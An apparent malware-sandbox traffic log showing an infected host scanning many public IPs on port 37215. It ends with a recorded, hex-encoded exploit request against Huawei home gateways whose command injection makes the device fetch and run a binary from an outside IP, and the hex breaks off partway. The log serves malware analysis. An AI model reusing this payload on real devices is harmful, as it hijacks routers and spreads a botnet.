              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 8.161.237.43:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 115.35.169.140:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.102.64.229:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 88.92.59.112:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.8.65.11:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 160.134.223.30:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.202.220.32:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.252.89.99:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.111.48.42:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.101.166.243:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.222.143.169:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.187.216.56:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 199.119.204.171:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.71.89.195:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.114.233.54:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.218.109.192:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.56.131.179:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.200.13.188:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.212.116.152:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.22.27.35:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.187.8.136:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.15.193.76:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.153.19.36:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.43.2.18:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.73.33.163:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.73.239.134:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.63.184.229:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.175.214.207:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.75.157.238:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.211.225.75:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 140.227.119.176:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.5.231.94:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.17.191.120:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 40.187.27.103:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.156.176.73:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.65.215.187:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 89.3.233.78:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 130.51.194.177:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 106.126.166.174:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 132.231.184.80:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.131.204.217:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.94.98.99:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.240.133.88:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 179.149.124.155:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.10.68.127:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.83.203.31:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.217.138.156:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.232.4.10:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 195.206.123.7:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 134.89.32.150:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.27.69.42:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.193.50.199:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.147.19.149:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.128.132.113:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.198.223.166:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.69.12.164:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.222.48.108:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.166.118.197:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.177.54.242:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.173.16.100:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 60.181.10.69:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 27.229.239.235:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.0.199.45:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.205.171.253:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 61.188.122.228:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.240.253.27:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 170.38.52.119:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.176.130.195:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.195.92.142:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.107.223.232:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.179.103.169:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.153.118.15:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 92.208.3.167:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.95.135.8:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.122.101.191:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.51.233.212:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.57.124.91:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 34.249.197.239:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.255.104.139:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 40.168.216.188:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.163.243.68:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 89.208.39.22:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.48.139.147:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.35.9.21:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.209.168.116:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.27.249.212:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.180.233.197:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.120.227.139:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 85.1.21.215:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.253.253.35:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.214.184.135:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.209.207.237:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 8.39.242.25:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.178.221.85:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.74.31.119:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.186.102.41:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 201.59.162.151:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.159.16.222:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.28.164.132:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 158.91.127.16:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.163.138.103:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 138.120.184.238:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.12.133.216:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.99.62.178:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.97.15.233:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 202.15.224.92:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 150.39.35.162:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.156.212.126:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.39.5.122:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.139.19.169:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.207.73.38:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.112.51.5:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.195.225.104:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.104.100.86:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 57.69.128.235:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 75.45.3.76:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.225.123.250:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.254.155.217:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.127.10.172:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.37.88.73:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.159.6.111:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 17.213.221.17:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.168.67.91:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 54.75.217.159:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.221.160.48:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.64.121.28:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.166.76.202:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.5.188.44:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.174.206.255:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.212.240.170:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.158.170.105:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.35.170.31:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.171.168.42:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.126.50.222:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 140.43.18.150:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 58.56.209.168:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.167.239.220:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 129.95.56.185:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.79.152.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.96.128.186:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 78.101.13.129:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 99.176.121.212:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.31.228.79:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.103.16.80:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.88.150.255:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.73.251.0:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.226.254.97:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 32.68.164.186:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.235.183.131:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 35.169.108.111:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.66.66.230:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.197.235.99:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 160.71.204.226:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.165.234.62:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.186.207.110:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.31.51.101:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.212.205.28:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.65.154.214:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 72.133.254.249:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 203.206.51.162:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 37.109.26.160:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.11.27.97:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 42.162.5.154:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 92.70.90.43:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 154.78.57.223:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 141.49.144.5:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.227.170.41:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.33.89.121:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.154.5.185:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.127.160.91:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.60.149.255:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.238.18.53:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.42.104.148:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.121.251.202:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.109.172.224:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 186.135.181.8:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 134.38.34.187:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.149.55.87:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.35.169.84:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.246.184.78:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.203.111.223:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.6.185.180:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.235.87.235:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.252.10.23:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.43.146.49:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.214.220.234:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.54.22.32:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.78.32.94:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 196.147.149.84:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 111.65.24.86:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.18.92.192:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.35.221.54:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.114.32.50:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.103.31.216:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 17.49.157.23:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.58.188.236:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 168.66.116.235:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 204.115.109.203:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 202.128.163.35:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.230.33.69:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.1.136.131:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.222.169.21:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.219.250.32:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.30.87.17:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.255.52.112:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.153.212.194:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.202.94.122:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.68.9.202:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.26.169.106:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.215.50.162:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 69.142.28.76:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.75.42.162:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 147.220.248.115:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.217.163.11:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.199.31.26:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.244.50.205:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.53.42.165:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 112.248.37.50:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.119.94.136:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.229.25.132:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.68.194.80:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.158.155.102:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.246.1.82:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 116.204.167.225:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.149.163.30:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.207.187.45:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.49.91.226:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 81.9.58.130:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 108.31.60.25:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 69.59.213.212:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.171.198.2:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.241.120.216:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.151.17.5:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.226.51.205:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.231.17.200:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.104.184.160:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 195.88.0.207:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 96.120.101.190:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 23.204.180.131:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 118.68.28.174:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.107.25.7:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 48.228.28.132:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 49.90.179.140:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.7.165.148:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.71.46.109:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.12.154.185:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.138.237.8:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.155.158.225:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.227.14.65:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.183.7.120:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 91.187.192.225:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.232.213.90:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.11.249.141:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.167.110.27:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.89.50.21:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 76.68.108.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.216.206.43:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.127.120.163:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.163.252.157:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.146.230.160:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 147.111.186.14:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.22.97.26:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.13.200.33:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.199.141.62:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 139.22.151.253:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.191.24.142:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 100.44.237.97:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 76.24.146.255:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.63.93.195:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.14.67.75:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 205.10.190.97:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 193.234.234.241:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.103.75.22:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.206.110.222:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.162.2.167:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.188.115.11:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 71.138.13.15:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.209.93.254:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.198.190.132:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.237.3.171:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.122.154.212:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.23.250.230:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.13.35.201:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.154.122.53:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.156.191.242:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.185.126.163:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.4.222.206:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.86.240.159:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 179.10.124.61:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.26.160.136:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.213.194.174:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.163.95.194:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.109.0.106:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 37.225.244.100:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.74.46.150:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.25.1.105:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.188.161.76:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.161.145.190:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.52.99.197:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.15.114.37:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.6.123.107:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.80.96.215:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 164.135.114.186:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.94.73.80:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.223.188.206:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 97.128.111.237:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.131.105.232:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.193.105.29:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.91.144.138:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.91.181.103:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.183.61.139:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.132.182.22:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.193.74.136:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.17.240.23:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.30.22.217:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.80.29.20:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.236.130.53:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 153.47.189.62:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.154.195.20:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.127.43.244:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 154.254.189.28:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 69.107.213.168:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.85.24.206:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.7.11.139:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.93.200.187:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 41.123.246.222:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.23.1.160:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.177.206.97:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.25.199.94:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 197.196.67.139:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 159.214.46.136:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.13.124.115:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 12.32.177.87:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 131.69.19.206:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.88.157.40:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 157.141.116.106:37215
              Source: global trafficTCP traffic: 192.168.2.23:11411 -> 176.166.188.17:37215
              Source: unknownDNS traffic detected: query: BC@^]B replaycode: Name error (3)
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 